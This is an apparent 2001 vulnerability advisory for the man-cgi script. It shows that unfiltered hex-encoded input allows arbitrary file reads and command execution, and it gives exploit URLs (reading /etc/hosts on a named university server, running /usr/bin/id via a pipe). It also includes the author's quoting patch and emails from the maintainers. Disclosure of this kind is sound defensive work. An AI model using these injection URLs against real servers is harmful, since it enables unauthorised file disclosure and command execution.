Man-cgi v1.3 and v2.0 contains remote vulnerabilities which allow any file on the web server to be viewed, and some implementations allow remote command execution due to lack of filtering of hex encoded characters. Exploit URL's included.
bde148ba24eeeaed3cbb01ed7b0992252003c4928d9ca6fd786ddf9a3fc401df
Upon researching several possible cgi based man holes I ran across the
following bugged code
© 1994-1999 Man-cgi 2.00, Panagiotis Christias
<christia@softlab.ntua.gr>
© 1995 Man-cgi 1.15 Modified for Solaris 2.3, David Adams,
<d.j.adams@soton.ac.uk>
© 1994 Man-cgi 1.15, Panagiotis Christias
<christia@theseas.ntua.gr>
© 1996 Man-cgi 1.15 Ported to linux and maintained by, Tom Vrana
<tom@sorry.vse.cz>
the issue is with the filtering of %20 or any other hex encoded url in
adittion to a known file name will allow you
to view the file with permissions of the web server ... in some
implementations it is also possible to specify the
path to a known executable and thus you are able to run the executable for
example /usr/bin/id. These issues
may be used to disclose sensitive information on your servr or possible
allow someone to run any command they want on
it ... if you have further questions mail me.
----------------------------------------------------------
http://www.ntua.gr/cgi-bin/man-cgi?%20/etc/hosts%20
reveals the following
#
# Internet host table
#
127.0.0.1 localhost
#147.102.222.210 achilles.noc.ntua.gr achilles
147.102.222.210 achilles.noc.ntua.gr achilles
147.102.222.211 patroklos.noc.ntua.gr patroklos
147.102.222.230 ulysses.noc.ntua.gr ulysses
# Required for backup
147.102.222.250 menelaos.noc.ntua.gr menelaos
-----------------------------------------------------------
http://xxx/cgi-bin/man-cgi?/usr/bin/id
or
http://xxx/cgi-bin/man-cgi?|/usr/bin/id
uid=99(nobody) gid=99(nobody) groups=99(nobody)
-----------------------------------------------------------
below are the Authors Patches and comments from one of the people who has
modified the script
to operate on other os's
Sorry for my delayed reply, too much work to do and too much email
to read and reply. Here is a quick fix:
***************
*** 185,191 ****
{ print "<HR align=left width=640 size=2 noshade>"; \
printf("<B>NOTE:</b> man page for %s may be in the wrong place.
\n",PAGE); \
printf("<A HREF=\"%s?%s+ANY\">Try all sections and all optional
pages</a>\n",URL,PAGE); } }' \
! PAGE=$COMMAND URL=$MANCGI
fi;
---- 178,184 ----
{ print "<HR align=left width=640 size=2 noshade>"; \
printf("<B>NOTE:</b> man page for %s may be in the wrong place.
\n",PAGE); \
printf("<A HREF=\"%s?%s+ANY\">Try all sections and all optional
pages</a>\n",URL,PAGE); } }' \
! PAGE="$COMMAND" URL="$MANCGI"
fi;
The values of the PAGE and URL variables should be quoted. This is the
first
step. I should correct several other parts of the script. I was quite
naive
when I wrote man-cgi several years ago :)
You're welcome to test the security of http://www.ntua.gr/cgi-bin/man-cgi
Regards,
Panagiotis
--
Panagiotis J. Christias Network Management Center
P.Christias@noc.ntua.gr National Technical Univ. of Athens, GREECE
----------------------------------------------------------------
On Thu, Feb 22, 2001 at 10:52:41AM -0000, David Adams wrote:
Sorry to be so dim, but I really could not fathom the point you were
trying
to make with your first email. Only now do I understand the significance
of puting in the %20 (space
character). I still don't understand your anonymity, but I guess I can
live with it.
The man-cgi script was written by Panagiotis Christias, and I made some
enhancements and got it working for Solaris. It works so well that noone
(AFAIK) has bothered to re-write it for Perl.
I am grateful that you have pointed out this security loop hole to us.
It is up to you whether you report it through the normal channels or not.
As it can be used to read the /etc/passwd file it could be a real
security
threat. I will look at the script and see if I can find a solution, I
hope
Panagiotis will do the same.
--
David Adams
Computing Services
Southampton University